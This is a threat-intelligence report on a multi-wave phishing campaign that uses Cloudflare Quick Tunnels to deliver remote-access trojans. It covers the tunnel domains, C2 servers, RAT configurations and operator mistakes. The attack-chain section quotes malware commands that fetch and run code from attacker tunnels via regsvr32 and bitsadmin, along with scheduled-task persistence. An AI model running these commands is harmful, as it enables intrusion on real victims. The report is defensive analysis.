5 Days of SERPENTINE#CLOUD: Tracking a Multi-RAT Campaign's Daily Infrastructure Rotation

Fresh IOCs, new .wsh initial access vector, 4-tunnel chain architecture, and operator attribution from 6 waves of Cloudflare Tunnel abuse

PublishedMarch 30, 2026

TLP: WHITE Date: 2026-03-30 Analyst: GHOST — Breakglass Intelligence Classification: Cybercrime / Initial Access Broker (financially motivated) Campaign Tracking Names: SERPENTINE#CLOUD (Securonix), TA577-adjacent (Proofpoint notation) Status: ACTIVE — Live infrastructure confirmed as of 2026-03-30

Executive Summary

SERPENTINE#CLOUD is an active, multi-wave phishing and RAT delivery campaign that has operated continuously since at least November 2025. The threat actor abuses Cloudflare's free Quick Tunnel service (trycloudflare.com) to host ephemeral WsgiDAV WebDAV servers, which serve a sophisticated multi-stage malware delivery chain primarily targeting German-speaking businesses with invoice-themed social engineering ("Rechnung" = invoice).

Breakglass Intelligence has now tracked five distinct investigation waves across this campaign spanning November 2025 through March 30, 2026, mapping a total of 27+ Cloudflare tunnel domains, 3 persistent C2 servers, and 9 distinct malware families deployed across victims. Today's (March 30) investigation reveals the actor is simultaneously deploying AsyncRAT, VenomRAT, and a custom RAT family called "PhilliVio" — a multi-RAT simultaneous deployment pattern previously flagged by Proofpoint as a signature behavior of this cluster.

The operator has committed significant OPSEC failures across all waves: build machine hostnames leaked in LNK metadata (desktop-bul6k1u, DESKTOP-BVGFFOA, ec2amaz-vjnf8l9, vincent-pc), European date formatting in campaign filenames, a consistent campaign naming convention ([code]_[country]_[type]_[DDMMYYYY]_[num]_[delivery]), and reuse of the same infrastructure patterns, Python loader obfuscation style, and WsgiDAV server across all waves.

Threat Level: HIGH. The campaign has been continuously active for five months with no signs of degradation. RAT capabilities include full remote access, keylogging, credential theft, DDoS, webcam capture, and persistent backdoor installation. German SMBs, accounting firms, and businesses receiving invoice communications are at elevated risk.

What Was Found vs. What Was Known

Aspect	Prior Public Reporting (Securonix/Proofpoint 2024–early 2026)	Breakglass Intelligence Findings (Nov 2025 – Mar 30, 2026)
Campaign name	SERPENTINE#CLOUD	Confirmed. Also aligns with Proofpoint TA577-adjacent cluster
Infrastructure	Cloudflare Quick Tunnels, WsgiDAV	Confirmed + enumerated 27+ tunnel domains across 5 months
RAT families	AsyncRAT, XWorm, Remcos	Confirmed + added: DcRat, VenomRAT, Violet v5, PureHVNC (Ygfumkl), PureCrypter, custom "PhilliVio" RAT
Simultaneous multi-RAT	Reported by Proofpoint	Confirmed: up to 9 RAT scripts deployed per wave
C2 servers identified	Limited	4 confirmed C2s: 91.219.238[.]140, 178.16.55[.]160, 43.157.1[.]71, 12.202.180[.]133
Build machine identifiers	Not previously reported	4 unique hostnames from LNK metadata across waves
UK targeting	Suspected	Confirmed: `UKM` prefix in batch filenames, UK-themed lure variants
Campaign active since	October 2024 (Securonix)	Artifacts dated to November 2025, with payload builder tooling from 2025-08
Python loader evolution	Single generation described	5 encryption generations documented (double-XOR → AES-CBC → polymorphic XOR+zlib → Kramer obfuscation)

Campaign Timeline

Date	Wave	Event
2025-08-05	Pre-campaign	`pun.py` APC injector compiled (author timestamp)
2025-09	Pre-campaign	`Sep01x86_Ayoo.zip` payload archive created (filename on open dir)
2025-11-28	Wave 0	Oldest confirmed payload archive timestamp (`age-das-centers-cargo` tunnel)
2025-12-13	Wave 1	PureCrypter payloads (rp.bin, sw.bin) built for March 4 campaign
2025-12-15	Wave 1	Tunnel staging: `/ent/` directory populated with `pun.py` and 5 encrypted payloads
2025-12-18	Wave 2	LNK file created on `desktop-bul6k1u` (opposite-lodge investigation)
2025-12-18	Wave 2	`zmorf.py` (polymorphic APC injector, alias `mubi.py`) uploaded to WebDAV
2025-12-30	Wave 2	Encrypted shellcode payloads kj.bin, db.bin uploaded
2026-01-03	Wave 2	BB1.bin payload uploaded (opposite-lodge staging server)
2026-01-16	Wave 1/2	`1ukj16.wsf` active (references dead tunnel — January rotation)
2026-01-19	Wave 1	IIS server `178.16.55[.]160` set up (XWorm C2)
2026-01-25–26	Wave 1	PureCrypter + XWorm payloads sw.bin, xwb.bin uploaded
2026-02	Wave 3	UKM02* batch scripts active (M02 = February targeting cycle)
2026-02-15	Wave 1	IIS server `43.157.1[.]71` set up (XWorm + DcRat multi-C2)
2026-02-15–16	Wave 1	DcRat (ap.bin) + XWorm variant (wx.bin) uploaded; Tunnel 1 lure created
2026-02-17	Wave 4	RDP certificate issued on `91.219.238[.]140` — C2 server provisioned
2026-02-18	Wave 4	XWorm RAT compiled (PE timestamp: 2026-02-18 11:44:06 UTC)
2026-03-02	Wave 1	`dat.wsh` cross-tunnel redirect created on lure tunnel
2026-03-04	Wave 1	Wave 1 active delivery: DATEV-Rechnung lure pushed to victims
2026-03-04 01:43 UTC	Wave 1	LNK lure file placed in `/Dokumente/`
2026-03-05	Wave 3	Multi-RAT UK-targeted wave (fuji-layout-exterior-bunch) — XWorm, AsyncRAT, DcRAT, Violet v5, PureHVNC
2026-03-18	Wave 2	LNK last accessed (op continuing use opposite-lodge)
2026-03-20	Wave 2	New payload s1.bin uploaded (infrastructure refresh)
2026-03-23	Wave 4	XWorm WebDAV staging tunnel created (move-friendly-international-observed)
2026-03-25	Wave 2/4	s2.bin, bb.bat, LNK lure refreshed on opposite-lodge; wet-envelope-beam-laser FSL campaign active
2026-03-25	Wave 5	wet-envelope-beam-laser: FSL_DE_INV DLL-loader chain deployed
2026-03-25	Wave 4	5 live XWorm staging tunnels confirmed; AWS EC2 hostname leaked in LNK
2026-03-26	Wave 2/4/5	GHOST investigation captures all three live campaigns simultaneously
2026-03-30	Wave 6	Today: named-suites-walked-gratis — 4-tunnel AsyncRAT + VenomRAT + PhilliVio deployment
2026-03-30	Wave 6	"MAR30" date-stamped payloads with Kramer class obfuscation (9.4MB+ Python RAT scripts)

Infrastructure Analysis

3.1 Cloudflare Tunnel Fleet (27+ Domains)

All tunnels use Cloudflare's free Quick Tunnel service (trycloudflare.com). The origin server IP is never exposed — all traffic proxies through Cloudflare's anycast network (primary: 104.16.230[.]132, 104.16.231[.]132). This provides the actor with free TLS, origin IP hiding, and unlimited ephemeral domains.

The actor rotates tunnels frequently but maintains consistent role assignments across waves: one tunnel for lure delivery, one for WSF/WSH scripts, one for batch downloaders, one for ZIP payloads.

Wave 1 — DATEV Invoice / Donut Shellcode (March 4, 2026)

Tunnel Domain	Role	Status
`shortly-flux-corresponding-junction.trycloudflare[.]com`	Lure delivery (LNK + dat.wsh)	DEAD (rotated)
`licensing-hypothesis-byte-thomas.trycloudflare[.]com`	Payload staging (dat.wsf, dat.bat, pun.py, 5x .bin/.txt)	DEAD (rotated)

Wave 2 — Microsoft Invoice / zmorf.py (December 2025 – March 26, 2026)

Tunnel Domain	Role	Status
`opposite-lodge-strict-closes.trycloudflare[.]com`	Lure + dropper (LNK, bb.bat, dd.wsf, zmorf.py, 5x payloads)	DEAD (rotated post-investigation)

Wave 3 — UK Multi-RAT (March 5, 2026)

Tunnel Domain	Role	Status
`fuji-layout-exterior-bunch.trycloudflare[.]com`	Stage 1: WSH lure (`Scan_0630274892048.pdf.wsh`)	DEAD
`dialogue-pool-cookie-mini.trycloudflare[.]com`	Stage 2: WSF loader (`ukmar03.wsf`)	DEAD
`stickers-gentleman-queen-dreams.trycloudflare[.]com`	Stage 3: BAT downloaders (`UKM031.txt`, `UKM032.txt`)	DEAD
`empire-judge-delhi-finest.trycloudflare[.]com`	Stage 4: ZIP payloads (`1Feb02MA.zip`, `1Feb02ST.zip`)	DEAD
`statutes-scripts-friendship-switch.trycloudflare[.]com`	January 2026 WSF target (dead tunnel in Jan)	DEAD

Wave 4 — German Telekom / XWorm (March 23–25, 2026)

Tunnel Domain	Role	Status
`move-friendly-international-observed.trycloudflare[.]com`	Primary staging (LNK, WSH, BAT, DLL, payloads)	DEAD (post-investigation)
`refers-lonely-realized-legends.trycloudflare[.]com`	Lure delivery (Telekom WSH lure)	DEAD
`presents-functional-works-steady.trycloudflare[.]com`	WSF payload hosting (`ukmar23.wsf`)	DEAD
`post-yields-instrument-coupon.trycloudflare[.]com`	BAT stage hosting (`UKM231.txt`, `UKM232.txt`)	DEAD
`age-das-centers-cargo.trycloudflare[.]com`	ZIP/payload distribution (oldest confirmed tunnel — Nov 2025)	DEAD

Wave 5 — FSL DLL Loader (March 25–26, 2026)

Tunnel Domain	Role	Status
`wet-envelope-beam-laser.trycloudflare[.]com`	All-in-one: LNK, DLL loader, encrypted payload, decoy PDF	DEAD (post-investigation)

Wave 6 — MAR30 Multi-RAT Python (March 30, 2026 — TODAY)

Tunnel Domain	Role	Status
`named-suites-walked-gratis.trycloudflare[.]com`	Stage 1: Lure WebDAV (WSH double-extension)	LIVE
`dresses-but-checkout-quiz.trycloudflare[.]com`	Stage 2: WSF dropper via UNC path	LIVE
`asset-military-cycle-appearance.trycloudflare[.]com`	Stage 3: BAT downloaders (PhM301.bat, PhM302.bat)	LIVE
`investigator-leu-spray-declared.trycloudflare[.]com`	Stage 4: Python 3.12 + RAT payloads (PhM23MA.zip, PhM23ST.zip)	LIVE

Additional Campaign Tunnels (from Wave 4 enumeration)

Tunnel Domain	First Seen	Status
`ralph-choices-jury-generator.trycloudflare[.]com`	2026-03-18	DEAD
`knife-jewellery-evaluate-defensive.trycloudflare[.]com`	2026-03-17	DEAD
`lone-logs-visit-isolated.trycloudflare[.]com`	2026-03-17	DEAD
`individually-bangkok-dedicated-static.trycloudflare[.]com`	2026-03-12	DEAD
`servers-johnson-rebate-recipes.trycloudflare[.]com`	2026-02-27	DEAD
`resolved-rss-carriers-found.trycloudflare[.]com`	2026-03-08	DEAD
`attending-symphony-census-harbor.trycloudflare[.]com`	2026-03-07	DEAD
`workflow-rest-wars-cargo.trycloudflare[.]com`	2026-02-28	DEAD
`radius-spoke-investments-cst.trycloudflare[.]com`	2026-02-23	DEAD
`advise-visual-playstation-closer.trycloudflare[.]com`	2026-02-23	DEAD
`intelligence-mighty-birthday-conceptual.trycloudflare[.]com`	2026-02-23	DEAD

3.2 C2 Servers

C2 IP	ASN / Provider	RAT Families	Ports	Hostname (RDP cert)	Status
`91.219.238[.]140`	AS56322 — ServerAstra Kft., Budapest, Hungary	XWorm	3389 (RDP), 7000 (XWorm C2)	`DESKTOP-BVGFFOA`	LIVE (as of 2026-03-25)
`178.16.55[.]160`	AS202412 — Omegatech LTD, Seychelles (bulletproof)	XWorm (xwb variant)	3389, 2323 (XWorm), 445 (SMB)	`DESKTOP-BUL6K1U`	LIVE
`43.157.1[.]71`	AS132203 — Tencent Cloud, Frankfurt, DE	XWorm (wx variant) + DcRat	3389, 2323 (XWorm), 3232 (DcRat), 445 (SMB)	`172_28_0_12` (Docker)	LIVE
`12.202.180[.]133`	AS7018 — AT&T, Chicago, IL, US	XWorm V3.1, AsyncRAT, DcRAT, PureHVNC	6745 (AsyncRAT), 6757 (PureHVNC), 7878 (DcRat), 8292 (XWorm)	Unknown	LIVE (AsyncRAT port confirmed open)
`12.202.180[.]105`	AS7018 — AT&T, Chicago, IL, US	Violet v5	2120 (Violet C2)	Unknown	LIVE

Note on C2 infrastructure architecture: The March 4 wave used two IIS-based C2s (178.16.55[.]160, 43.157.1[.]71) running RATs on multiple ports. The March 5 UK wave used a single AT&T residential/business IP cluster (12.202.180.x) with 5 RAT ports across two adjacent IPs — suggesting a compromised host or VPN endpoint. The March 25 XWorm wave uses a dedicated ServerAstra VPS. The March 30 wave C2s are as yet unextracted from the obfuscated Python scripts.

3.3 Staging Server Configuration

All waves share an identical WsgiDAV configuration fingerprint:

Software: WsgiDAV 4.3.3 (Waves 1–6) or WsgiDAV 4.3.0 (Wave 3 UK variant)
Python runtime: CPython 3.12.6 (underlying WsgiDAV runtime)
Access: Anonymous read-write (no authentication on any observed tunnel)
Server header: cloudflare (masked by Cloudflare proxy)
Cheroot version: cheroot/10.0.1 (WSGI server used by WsgiDAV)
Quota consistency: All tunnels in a wave report identical quota-used-bytes — confirming all tunnels in a single wave originate from the same physical machine

Attack Chain

The campaign uses a consistent multi-stage delivery chain with minor evolution between waves. The core architecture has remained stable for 5+ months.

[Phishing Email] → German invoice / scan / Telekom lure link or attachment
        |
        v
[Stage 1: WebDAV Lure File] — Cloudflare Tunnel 1
  - File types: .url, .lnk, .wsh (double-extension: name.pdf.wsh)
  - .url: Windows WebDAV MiniRedir auto-mounts tunnel as network share
  - .lnk / .wsh: Uses WebDAV UNC path (\\tunnel@SSL\DavWWWRoot\...)
        |
        v
[Stage 2: Script Loader] — Cloudflare Tunnel 2
  - File types: .wsf (JScript) or .bat (CMD)
  - Copies next-stage files from Tunnel 3 to %USERPROFILE%\Contacts\
  - Renames files (e.g., .txt → .bat to evade gateway detection)
  - 90-second delay between stages (sandbox evasion)
        |
        v
[Stage 3: Batch Downloader] — Cloudflare Tunnel 3
  - Downloads ZIP archives from Tunnel 4
  - Creates persistence in Windows Startup folder
  - Hides payload directories with attrib +h
  - Deletes .bat files post-execution (anti-forensics)
        |
        v
[Stage 4: ZIP Payload Archives] — Cloudflare Tunnel 4
  - 20MB ZIPs containing portable Python runtime (3.11–3.14) + PyCryptodome
  - Extraction to %USERPROFILE%\Contacts\MainRingtones\ (or similar cover directory)
  - Startup persistence via .bat or .lnk in Startup folder
        |
        v
[Stage 5: Python Shellcode Injector]
  - Per-wave variants:
    Wave 1/2: pun.py / zmorf.py — multi-layer XOR + zlib, then APC injection
    Wave 3/4: encrypted_loader.py — AES-256-CBC, then CreateRemoteThread injection
    Wave 6: Kramer-obfuscated Python scripts (1.3MB – 13.7MB) — AES + XOR
  - All inject into explorer.exe (suspended process creation)
        |
        v
[Stage 6: Shellcode Framework]
  - Waves 1/3: Donut v0.9.2/v0.9.3 (Chaskey CTR) → AMSI + WLDP bypass → .NET CLR load
  - Waves 4/6: Direct encrypted PE injection (no Donut) or Donut variant
        |
        v
[Stage 7: .NET RAT Execution in explorer.exe context]
  - Wave 1: XWorm V6.4, DcRat, PureCrypter (x2) — 5 simultaneous RATs
  - Wave 3: XWorm V3.1, AsyncRAT, DcRAT, Violet v5, PureHVNC — 5 simultaneous RATs (9 scripts w/ variants)
  - Wave 4: XWorm (single RAT, Python AES-CBC delivery)
  - Wave 5: Unknown RAT (pnljjd.dll → ombmh.dat encrypted payload)
  - Wave 6: AsyncRAT, AsyncRAT variant, VenomRAT, PhilliVio RAT — 4+ simultaneous RATs
        |
        v
[Persistence]
  - Startup folder .bat / .lnk ("CryptoLoader.lnk", "startup.bat", "start.bat")
  - Registry Run key (DcRat waves)
  - Scheduled task /sc onlogon (DcRat waves)
  - Payload directory hidden with attrib +h
        |
        v
[C2 Callback]
  - TCP callbacks to dedicated VPS (ServerAstra, Omegatech, Tencent, AT&T)
  - XWorm on port 2323 or 7000; DcRat on 3232; AsyncRAT on 6745

Alternative Execution Paths

DLL Side-Load Path (Wave 5 — wet-envelope-beam-laser):

.url file → Windows WebDAV MiniRedir mounts tunnel
  → PROPFIND discovers .PDF.lnk
  → LNK: cmd.exe /c regsvr32 /s \\tunnel@SSL\DavWWWRoot\pnljjd.dll
  → DllRegisterServer: self-copies to %LOCALAPPDATA%\Microsoft\WinHTTP\wdigest.dll
  → Reads + decrypts ombmh.dat (84KB, 99.9% entropy)
  → Executes decrypted stage-2 payload

bitsadmin Download Path (Wave 2 — opposite-lodge):

LNK: cmd.exe /c bitsadmin /transfer job /priority FOREGROUND [tunnel]/dd.wsf %TEMP%\dd.wsf
  → wscript %TEMP%\dd.wsf
  → bb.bat downloads Python 3.14.0rc3 + zmorf.py + payloads

Malware Analysis

5.1 Python Loader Evolution (5 Generations)

The Python injection tooling has evolved across campaign waves while maintaining the same core technique: download Python runtime → inject shellcode into suspended explorer.exe process.

Generation	Tool Name	Detection Rate	Encryption	Injection Method
Gen 1 (Wave 1, Mar 4)	`pun.py`	Low	Double XOR (8-byte hex keys, .txt files)	QueueUserAPC (Early Bird)
Gen 2 (Wave 2, Dec–Mar)	`zmorf.py` / `mubi.py`	3/76	Triple XOR + zlib (3 key layers, var-length)	QueueUserAPC
Gen 3 (Wave 3, Mar 5)	unnamed scripts (9x)	Low	AES-256-CBC + double XOR	QueueUserAPC (CREATE_SUSPENDED)
Gen 4 (Wave 4, Mar 23)	`encrypted_loader.py`	Low	AES-256-CBC (key+IV in as_key.bin)	CreateRemoteThread
Gen 5 (Wave 6, Mar 30)	`1MAR30_*-obf.py` scripts	Unknown	Kramer-class obfuscation	QueueUserAPC (presumed)

zmorf.py / mubi.py deserves special note: it is a polymorphic injector where XOR function names are randomized at runtime via random.choices() (pattern: eval(f"{prefix}_xor")). This prevents naive static signature matching. The identical tool appears on VirusTotal under the name mubi.py, first submitted approximately 2025-01-22, predating this campaign's confirmed start.

Wave 6 Kramer obfuscation produces unusually large scripts (1.3MB to 13.7MB) — the "Kramer" class name appears to be a obfuscation framework name embedded in the script structure. Scripts are named with repeated characters identifying the payload family: Annnnnnnnnnnnnnnnn = AsyncRAT, Asssssssssssss = AsyncRAT variant, Hvvvvvvvvvvvvvv = VenomRAT, PHilli_Vioooooooo = PhilliVio custom RAT.

5.2 RAT Families Deployed

AsyncRAT (Waves 3, 6)

Version: 0.5.7B (Wave 3)
C2 (Wave 3): uejrhnfq.duckdns[.]org:6745 → 12.202.180[.]133 (AT&T Chicago)
Config encryption: AES-256-CBC + PBKDF2-HMAC-SHA1 (50,000 iterations)
Key (Wave 3): Ff6VygGEmXLxZ17uU1fqBwyv7Not5Jtw
Mutex: AsyncMutex_6SI8OkPnk
Certificate: CN=AsyncRAT Server (RSA 4096-bit, valid 2024-05-25 to 9999-12-31)
Delivery (Wave 6): 1MAR30_Annnnnnnnnnnnnnnnn-obf.py (1.3MB) + 1MAR30_Asssssssssssss-obf.py (1MB) — two simultaneous AsyncRAT instances
Key capabilities: TLS-encrypted C2, certificate pinning, MessagePack protocol, Pastebin fallback C2, plugin system, anti-VM, HWID tracking

XWorm (Waves 1, 3, 4)

Versions: V3.1 (Wave 3), V6.4 (Wave 1)
Branding: XWorm V6.4 by celestialproject.org (domain offline)
C2s (Wave 1):
- 178.16.55[.]160:2323 — Omegatech bulletproof hosting (Seychelles)
- 43.157.1[.]71:2323 — Tencent Cloud Frankfurt (also hosts DcRat on port 3232)
C2 (Wave 3): hy647dhon.duckdns[.]org:8292 → 12.202.180[.]133
C2 (Wave 4): 91.219.238[.]140:7000 — ServerAstra Budapest
Config encryption (V6.4): AES-256-ECB, key from MD5(UTF-8(Mutex)) with overlapping Array.Copy to 32-byte buffer
Mutexes: USB.exe (V6.4), LApcAYSFOShHukHW (Wave 4), lOyuApQB7sBGSt3o (V3.1)
Shared key: <666666> (V6.4), <123456789> (V3.1)
Key capabilities: Remote shell, DDoS, keylogger, plugin system, webcam (avicap32.dll), USB worm, UAC bypass, process injection, credential recovery, screenshot

VenomRAT (Wave 6)

Delivery: 1MAR30_Hvvvvvvvvvvvvvv-obf.py (9.4MB) + 2LazMAR30_hvvvvvvvvvvvvvv.py (loader)
C2: Not yet extracted (obfuscated scripts)
Note: Simultaneous deployment alongside AsyncRAT matches the Proofpoint-documented SERPENTINE#CLOUD signature behavior of dropping multiple RATs concurrently

DcRat / qwqdanchun variant (Waves 1, 3)

Attribution string: DcRatByqwqdanchun
C2 (Wave 1): 43.157.1[.]71:3232 (shares infrastructure with XWorm)
C2 (Wave 3): y57kdsa.duckdns[.]org:7878 → 12.202.180[.]133
Config encryption: AES-256-CBC + PBKDF2-HMAC-SHA1 (50,000 iterations), salt = DcRatByqwqdanchun
Certificate (Wave 1): CN=DcRat, Issuer: C=CN, L=SH, O=DcRat By qwqdanchun, CN=EBOLA — Shanghai origin marker
Certificate (Wave 3): CN=DcRat, RSA 1024-bit, valid 2023-09-07 to 2034-06-16
Key capabilities: AMSI/ETW bypass, camera access, anti-analysis process killing (15+ processes), UAC bypass, D/Invoke dynamic API resolution, NtProtectVirtualMemory unhooking

PureCrypter (Wave 1)

Samples: rp.bin (754KB) + sw.bin (384KB) after Donut decapsulation
Assembly names: Xwann.exe, Iqovaeay.exe
Role: Loader/dropper for additional encrypted inner payloads

Violet v5 (Wave 3)

C2: volvogroup20.duckdns[.]org:2120 → 12.202.180[.]105
Config obfuscation: Double-base64 + XOR with hardcoded key AGZOVok (7 bytes)
Auth key: E8R1a8yU1baxo8ok
Mutex: XSRSXSX
Key capabilities: Bot-killer, clipboard hijacker (crypto theft), ngrok tunneling, credential stealing, network discovery, fake Windows Update screen, BSOD trigger, DDoS

PureHVNC via Ygfumkl packer (Wave 3)

Packer SHA256: f56a53ec6817c918d9a0056277022d694a06727bc9064bee95e4b80c50067f2a
Inner payload: Lhjknyy.dll (788,480 bytes)
C2: 12.202.180[.]133:6757 (same server as AsyncRAT and DcRAT)
Protection: ConfuserEx runtime IL generation + proxy delegate obfuscation
Protocol: Protobuf serialization + AES-encrypted communication
Key capability: Hidden VNC — remote desktop access without victim awareness

PhilliVio RAT (Wave 6 — NEW, UNANALYZED)

Delivery: 1MAR30_PHilli_Vioooooooo-obf.py (13.7MB — largest payload in this investigation)
Family classification: Unknown / custom RAT (not matching known families in open source)
Note: The name "PhilliVio" may reference the actor's handle or a private MaaS product not in public threat intelligence databases. The 13.7MB obfuscated script suggests a heavily featured toolkit. Further analysis required.

5.3 Donut Shellcode Framework (Waves 1, 3)

All Donut-wrapped payloads use identical configuration:

Donut version: v0.9.2 / v0.9.3
Cipher: Chaskey block cipher in CTR mode (128-bit blocks, 16 rounds, big-endian counter increment)
AMSI bypass: Patches AmsiInitialize, AmsiScanBuffer, AmsiScanString
WLDP bypass: Patches WldpQueryDynamicCodeTrust, WldpIsClassInApprovedList
DLL loads: ole32.dll, oleaut32.dll, wininet.dll, mscoree.dll (CLR host)
Target: .NET EXE modules loaded into explorer.exe via APC injection

5.4 Persistence Mechanisms

Wave	Mechanism	Path	Notes
All waves	Startup folder .bat	`%APPDATA%\...\Startup\startup.bat` or `start.bat`	Re-executes Python injector on logon
Waves 1/3	Startup folder .lnk	`%APPDATA%\...\Startup\CryptoLoader.lnk`	Disguised as "Windows Crypto Loader"
Wave 1 (DcRat)	Registry Run key	`SOFTWARE\Microsoft\Windows\CurrentVersion\Run\`	Standard persistence
Wave 1 (DcRat)	Scheduled task	`schtasks /create /f /sc onlogon /rl highest`	High-privilege logon trigger
Wave 5	DLL copy	`%LOCALAPPDATA%\Microsoft\WinHTTP\wdigest.dll`	Mimics legitimate Windows authentication DLL
Wave 6	Startup batch + hidden directories	`%USERPROFILE%\Contacts\` (attrib +h)	Cover directory: Contacts folder

Operator OPSEC Failures

This threat actor has committed consistent, trackable OPSEC failures across every wave. These errors provide the strongest attribution leads available.

6.1 Build Machine Hostnames in LNK Metadata

LNK files created by the actor embed the creating machine's hostname in the TrackerDataBlock structure. This is a persistent Windows metadata artifact that survives file copying and compression.

Wave	LNK File	Machine Hostname	SID / Account	Significance
Wave 1 (Mar 4)	DATEV-Rechnung Nr. 69928142421.pdf.lnk	`vincent-pc`	S-1-5-21-[...]-500 (Admin)	Personal/disposable machine, built on Administrator account
Wave 2 (Dec 25–Mar 26)	Rechnung G143822563.lnk	`desktop-bul6k1u`	S-1-5-18 (SYSTEM)	SYSTEM-privileged build, same hostname appears in C2 RDP cert
Wave 4 (Mar 23)	DKM_00KS0095283.PDF.lnk	`ec2amaz-vjnf8l9`	Unknown	AWS EC2 Windows AMI default hostname — builds/tests on cloud infrastructure
Wave 5 (Mar 25)	FSL_DE_INV_24032026_238969_EML.PDF.lnk	(machine SID only)	S-1-5-21-3343087317-1842942590-547433828-500 (Admin)	Unique machine SID, third distinct build environment

Critical correlation: The hostname DESKTOP-BUL6K1U embedded in LNK metadata from Wave 2 also appears as the RDP certificate Common Name on C2 server 178.16.55[.]160. This definitively links the payload builder to the C2 operator — the same machine was used to build lures AND runs the XWorm C2 server. The actor connected their build machine to the internet-facing C2 without hostname sanitization.

6.2 AWS EC2 Build Environment

The hostname ec2amaz-vjnf8l9 follows the exact pattern of AWS EC2 Windows AMI default hostnames: ec2amaz-[7 alphanumeric chars]. This confirms the actor used a Windows EC2 instance (likely t3.medium or t3.large with Windows Server AMI) to build Wave 4 payloads. AWS CloudTrail logs for this instance, if compelled via law enforcement request, could yield API call history, IAM credentials, and payment information.

6.3 European Date Formatting and Campaign Naming Conventions

The FSL campaign (Wave 5) uses DD/MM/YYYY date formatting in filenames (FSL_DE_INV_24032026_238969_EML). This is not standard in US, UK, or East Asian computing contexts without explicit locale configuration. Combined with German-language targeting and work patterns consistent with Central European Time (e.g., pun.py modified 2025-08-05, PDF created at ~05:00 local = 04:00 UTC):

Likely timezone: CET/CEST (UTC+1/+2)
Likely language context: European, possibly native German speaker or targeting-focused actor in a German-speaking region

6.4 Campaign Naming System

The actor uses a consistent internal naming system that exposes campaign metadata:

FSL_[COUNTRY]_[TYPE]_[DDMMYYYY]_[TICKET#]_[DELIVERY]
      ^           ^        ^
      Campaign    Target   European date
      code        market   format

UKM[MM][STAGE]  →  M03 = March, UK = United Kingdom, stage codes: LK/WF/BT/ZP
                          ^-- confirms United Kingdom as a second targeting geography

PhM[DDMA]  →  PhM301 = March 30, Day 1; PhM302 = March 30, Day 2
1MAR30_[RAT][repeated_char]-obf  →  date-stamped obfuscated RAT scripts

This naming convention reveals that the actor manages a multi-country campaign operation with systematic per-wave date tracking. The "FSL" code may be an actor handle, team abbreviation, or campaign series name.

6.5 WsgiDAV Server Exposed Directory Listing

All staging tunnels expose anonymous read-write WsgiDAV with full directory listing enabled. This has two consequences:

Any researcher (or competing threat actor) can enumerate, download, and upload files to the staging server
File timestamps are exposed, enabling precise timeline reconstruction of payload staging activity
In the Wave 4 investigation, the WsgiDAV displayname was set to "Music" — the actor was sharing their Windows Music folder, revealing they run the WebDAV server directly from a personal Windows workstation

6.6 DuckDNS Dynamic DNS Reuse

Waves 3 C2s all use DuckDNS (*.duckdns.org) subdomains resolving to the same AT&T IP cluster. DuckDNS accounts are free and linkable via creation IP. All five RAT families in Wave 3 share two C2 IP addresses (12.202.180.133 and 12.202.180.105), indicating the actor manages all RATs from a single compromised or provisioned host.

Victimology

7.1 Target Profile

Based on lure analysis across all waves:

Factor	Evidence
Primary language	German ("Rechnung", "Dokumente", "dokumente" directory, DATEV software lures)
Secondary targets	United Kingdom (UKM prefix in batch scripts, UK-themed scan lures)
Delivery context	Invoice/billing communications — targets business users who receive financial documents
Sector targeting	Accounting/DATEV clients (Wave 1), Deutsche Telekom customers (Wave 4), general business (Waves 2, 5)
Organization size	SMB-focused (DATEV is the dominant accounting software for German SMBs; Telekom targets individual subscribers and small offices)
Geographic concentration	DACH region (Germany, Austria, Switzerland) + UK

7.2 Lure Documents Used

Wave	Lure	Stolen From / Source
Wave 1	DATEV-Rechnung Nr. 69928142421 (ZUGFeRD invoice from invoice-portal.de)	Legitimate WordPress site; real ZUGFeRD XML invoice format
Wave 2	Microsoft billing invoice G143822563	Fake — generated by actor (Author: "Microsoft", iText PDF creator)
Wave 3	Generic scan document (Scan_0630274892048)	No decoy document
Wave 4	DKM_00KS0095283 German telecom document	No external decoy; lure filename only
Wave 5	German GmbH registration guide from Healy Consultants	Stolen from Healy Consultants Group PLC (PDF author: "Aidan Healy", created 2024-06-11 in UTC+08:00 timezone)
Wave 6	`Re_0464546564392713.pdf.wsh` invoice reference	Unknown — filename suggests invoice reference number

7.3 Victim Impact Assessment

RAT capabilities deployed across all waves include:

Credential theft: Browser password recovery (XWorm, Violet v5), AsyncRAT modules
Keylogging: All XWorm variants, Violet v5
Financial fraud enablement: Clipboard hijacking (Violet v5 cryptocurrency clipper)
Remote access: Full interactive shell across all RAT families; Hidden VNC (PureHVNC)
Data exfiltration: File upload/download, screen capture, webcam access
DDoS: XWorm, Violet v5 have confirmed DDoS capabilities
Persistence: Multiple mechanisms ensure long-term access; victims re-infected on every logon

Given the targeting of DATEV accounting software users, the most likely business impact is financial fraud (access to bank accounts and accounting systems), business email compromise enablement (via credential theft), and corporate espionage (via PureHVNC hidden remote desktop).

Cross-Campaign Correlation

8.1 Infrastructure Linkages

Signal	Wave 1	Wave 2	Wave 3	Wave 4	Wave 5	Wave 6
WsgiDAV 4.3.x	4.3.3	4.3.3	4.3.0	4.3.3	4.3.3	4.3.3
Anonymous R/W WebDAV	Y	Y	Y	Y	Y	Y
Python portable runtime abuse	Python 3.14.0rc3	Python 3.14.0rc3	Python 3.12	Python 3.11.8	N/A	Python 3.12
APC injection into explorer.exe	Y (pun.py)	Y (zmorf.py)	Y	Y (CreateRemoteThread)	N/A	Y
Startup folder persistence	Y	Y	Y	Y	Y	Y
German invoice lure	Y (DATEV)	Y (Microsoft)	N (scan)	Y (Telekom)	Y	Y
Double-extension trick	.pdf.lnk	.lnk	.pdf.wsh	.pdf.lnk	.PDF.lnk	.pdf.wsh
campaign date stamp in filename	Y (Mar 4 staging)	N	Y (Mar05)	Y (Mar23)	Y (24032026)	Y (MAR30)

8.2 Malware Builder Toolchain Consistency

The desktop.ini file found in both Wave 1 and Wave 2 staging servers carries an identical creation timestamp of 2023-06-22 18:58:48 UTC — an artifact from a shared builder template that predates the current campaign wave by years. This suggests the actor has been using the same WebDAV folder template (likely a Windows Desktop.ini that forces the Explorer "Downloads" spoofing) since at least 2023.

8.3 Filename Encoding Pattern

All Python RAT script filenames follow the same encoding convention: repeated characters identify the RAT family, and the date code identifies the campaign wave:

1Xwrmmmm...Mar05 (Wave 3, March 5, XWorm)
1annnnnn...Mar05 (Wave 3, March 5, DcRAT/Anarchy)
1assssss...Mar05 (Wave 3, March 5, AsyncRAT)
1hvvvvvv...Mar05 (Wave 3, March 5, PureHVNC/hvnc)
1MAR30_Annnnnnn-obf (Wave 6, March 30, AsyncRAT)
